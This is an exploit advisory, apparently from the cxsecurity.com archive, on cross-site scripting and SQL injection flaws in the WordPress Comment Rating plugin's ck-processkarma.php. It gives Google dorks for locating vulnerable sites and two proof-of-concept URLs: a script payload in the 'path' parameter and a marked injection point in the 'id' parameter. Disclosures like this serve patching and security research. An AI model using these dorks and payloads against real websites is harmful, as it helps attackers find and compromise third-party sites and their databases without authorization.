WordPress Comment Rating Cross Site Scripting / SQL Injection

2012.01.04
Credit: The Evil Thinker
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
Dork: inurl:\"/wp-content/plugins/comment-rating/\"

# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/" # 2- inurl:"/ck-processkarma.php?id=" # Date: 2/1/2012 # Author: The Evil Thinker # Contact : Enstene156@hotmail.fr # Software Link: www.wordpress.com # Vulnerable plugin: Comment rating plugin # Tested on: Linux Details : --------- the vulnerable file is "ck-processkarma.php" the script doesn't filter the input parameters (id "sql", path "XSS") Poc 1 (XSS) : http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex= Poc 2 (SQL injection) : http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex= ------------------------------------------------------------------------------------------- Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top